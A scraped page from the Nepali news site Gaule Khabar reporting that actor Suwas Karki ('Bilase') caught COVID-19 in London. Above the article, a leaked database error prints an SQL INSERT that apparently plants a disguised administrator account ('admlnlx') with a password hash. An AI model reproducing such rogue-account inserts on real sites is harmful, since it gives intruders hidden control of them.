WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B16TvAv/jyeTryAxhRcXUbCTlWBeHc0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:23:01', '', 'admlnlx', 'admlnlx')

कलाकार सुवास कार्की ‘विलासे’ लाई कोरोनाको संक्रमण – Gaule Khabar

कलाकार सुवास कार्की ‘विलासे’ लाई कोरोनाको संक्रमण

कलाकार सुवास कार्की ‘विलासे’ लाई कोरोनाको संक्रमण

 

बैशाख १८, काठमाडौं –

हाँस्यटेलिशृंखला भद्रगोलमा ‘विलासे’को भूमिकामा अभिनय गर्दै आएका कलाकार सुवास कार्कीलाई कोरोना संक्रमण देखिएको छ ।

विगत २ वर्षदेखि लण्डनमा बस्दै आएका सुवासलाई हालै कोरोना संक्रमण भएको पुष्टी भएको  अनलाइन खबर मा उल्लेख छ । उनलाई उनी बस्दै आएको घरमा नै आइसुलेसनमा राखिएको छ ।

कुमार कट्टेल ‘जिग्री’सँगको कुराकानीमा सुवासले आफ्नो स्वास्थ्यमा सुधार आइरहेको बताए । अहिले आफु पहिलाको भन्दा सहज महशुस हुन थालेको सुवासले बताएका थिए । सुवास परिवार परिवारसँगै लण्डनमा बस्दै आएका छन् । सुवासलाई कोरोना देखिएपछि उनको परिवारमा पनि डर थपिएको छ । सुवासका एक छोरा र एक छोरी छन् ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका